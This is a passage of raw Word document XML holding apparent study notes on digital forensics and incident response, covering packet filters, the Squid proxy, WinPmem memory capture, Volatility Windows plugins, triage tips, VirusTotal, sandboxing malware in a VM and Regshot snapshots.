            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidR="0069793F" w:rsidRPr="00E05502">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> Traffic going or from host 8.8.8.8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25A2E6B6" w14:textId="77777777" w:rsidR="00E05502" w:rsidRPr="00E05502" w:rsidRDefault="00E05502" w:rsidP="00E05502">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>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coming from host 8.8.8.8</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1046C56D" w14:textId="186E2031" w:rsidR="00E05502" w:rsidRPr="00E05502" w:rsidRDefault="00E05502" w:rsidP="00E05502">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>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where the src is not 8.8.8.8.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4A79D71A" w14:textId="7A938CF7" w:rsidR="00E05502" w:rsidRPr="00E05502" w:rsidRDefault="00E05502" w:rsidP="00E05502">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="27"/>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3654AC">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>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3654AC">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="28"/>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3654AC">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>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3654AC">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>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3654AC">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="29"/>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 xml:space="preserve">Squid is a popular open-source web proxy other include, </w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Blue</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserv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0C2DB2">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>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0C2DB2">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="30"/>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119" w:type="dxa"/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="396EB441" w14:textId="77777777" w:rsidR="00303D06" w:rsidRDefault="008C078C" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>WinPmem: capture RAM in Windows</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6706045E" w14:textId="77777777" w:rsidR="008C078C" w:rsidRPr="008C078C" w:rsidRDefault="008C078C" w:rsidP="008C078C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C078C">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Analyzing an image of RAM has become a staple of investigations</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="6CE2736C" w14:textId="77777777" w:rsidR="008C078C" w:rsidRPr="008C078C" w:rsidRDefault="008C078C" w:rsidP="008C078C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C078C">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>First, we need to collect memory (WinPmem)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4672D7F1" w14:textId="77777777" w:rsidR="008C078C" w:rsidRPr="008C078C" w:rsidRDefault="008C078C" w:rsidP="008C078C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="31"/>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8C078C">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="6"/>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45CBA155" w14:textId="7833BA93" w:rsidR="006F6673" w:rsidRPr="006F6673" w:rsidRDefault="006F6673" w:rsidP="006F6673">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>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6F6673">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>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6F6673">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>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6F6673">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="32"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F6673">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>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69E87789" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00EB096B" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006F6673">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>windows.pslist</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006F6673">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.PsList</w:t>
            </w:r>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74AB8DF5" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00EB096B" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>windows.pstree.PsTree</w:t>
            </w:r>
            <w:r w:rsidR="00CE5136">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: this plugin lists the parent child relationship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74C557FF" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00EB096B" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>windows.netscan.NetScan</w:t>
            </w:r>
            <w:r w:rsidR="00CE5136">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: This plugin helps you investigate unexpected network listenners or connections. It is similar to the output of netstat, or Get-NetTCPconnection and Get-NetUDPEndpoint.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4D8B4311" w:rsidR="00303D06" w:rsidRPr="006F5A04" w:rsidRDefault="00EB096B" w:rsidP="00303D06">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>windows.cmdline</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.CmdLine</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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119" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7CC1BC80" w14:textId="0D32680D" w:rsidR="00303D06"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windows.dlllist</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002257B2">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.DllList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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Windows.driverscan.DriverScan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>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Windows.envars.Envars</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>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Windows.filescan.FileScan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>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Windows.dumpfiles.DumpFiles</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: Carve out files</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0AD70A9D"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Windows.info.Info</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: Examine Windows version information</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="46AB559E"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Windows.hashdump.HashDump</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>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Windows.privileges.Privs</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>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Windows.registry.hivelist</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002257B2">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.Hivelist</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002257B2">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w: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Windows.registry.printkey</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002257B2">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.PrintKey</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: Access keys with - - offset</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07386325"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Windows.registry.userassist</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002257B2">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.UserAssist</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002257B2">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w: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Windows.registry.certificates</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="002257B2">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.Certificates</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="002257B2">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:i/>
                <w:iCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">: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Windows.svscan.SvcScan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:proofErr w:type="gramEnd"/>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F82307">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="332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119"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675655">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="34"/>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675655">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00675655">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Suspicious process? Start with </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00675655">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>PSList</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00675655">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> and </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00675655">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>PsTree</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
          <w:p w14:paraId="6DF151CC" w14:textId="77777777" w:rsidR="00675655" w:rsidRPr="00675655" w:rsidRDefault="00675655" w:rsidP="00675655">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00675655">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Suspicious network listener? Start with </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00675655">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>NetScan</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00675655">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>, the move to processes.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="3D1F7EF4" w14:textId="50F7C7E9" w:rsidR="00675655" w:rsidRPr="00675655" w:rsidRDefault="00675655" w:rsidP="00675655">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="33"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00675655">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">Suspicious programs? Start with </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00675655">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>CmdLine</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00675655">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>,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8C6E66">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>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8C6E66">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="35"/>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8C6E66">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C6E66">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Someone might have reverse engineered it already</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="276F9BC8" w14:textId="77777777" w:rsidR="008C6E66" w:rsidRPr="008C6E66" w:rsidRDefault="008C6E66" w:rsidP="008C6E66">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="36"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="008C6E66">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>But not always</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="008C6E66">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> ..</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="008C6E66">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve">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8C6E66">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="37"/>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8C6E66">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="37"/>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r w:rsidRPr="006F5A04">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>VirusTotal</w:t>
            </w:r>
            <w:r w:rsidR="00DE7794">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>: will run a specimen through several antivirus engines, can you can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has sandboxes that run malware and record activity. Can choose if sample should be shared with community, and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FF2408">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00FF2408">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>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t xml:space="preserve">Never EVER investigate malware on your day-to-day host…EVER. </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1352A293" w14:textId="158D61CC" w:rsidR="007E6E57" w:rsidRPr="00FF2408" w:rsidRDefault="007E6E57" w:rsidP="00FF2408">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38"/>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More common to use a VM</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0D1674F0" w14:textId="77777777" w:rsidR="007E6E57" w:rsidRPr="00FF2408" w:rsidRDefault="007E6E57" w:rsidP="00FF2408">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38"/>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FF2408">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="38"/>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0F53F8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="000F53F8">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Get-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="000F53F8">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>FileHash</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>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0F53F8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>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0F53F8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>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0F53F8">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="39"/>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F96D08">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="40"/>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F96D08">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="40"/>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F96D08">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="40"/>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F96D08">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="40"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Run malware.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5A418E0F" w14:textId="02436002" w:rsidR="00F96D08" w:rsidRDefault="00F96D08" w:rsidP="00F96D08">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="40"/>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F96D08">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="40"/>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F96D08">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="40"/>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F96D08">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="40"/>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653DBF">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="41"/>
              </w:numPr>
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00653DBF">
              <w:rPr>
                <w:rFonts w:ascii="Baskerville" w:hAnsi="Baskerville"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Take a snapshot before and after running the malware, and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653DBF">
            <w:pPr>
              <w:pStyle w:val="ListParagraph"/>
              <w:numPr>
                <w:ilvl w:val="0"/>
                <w:numId w:val="41"/>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Regshot</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
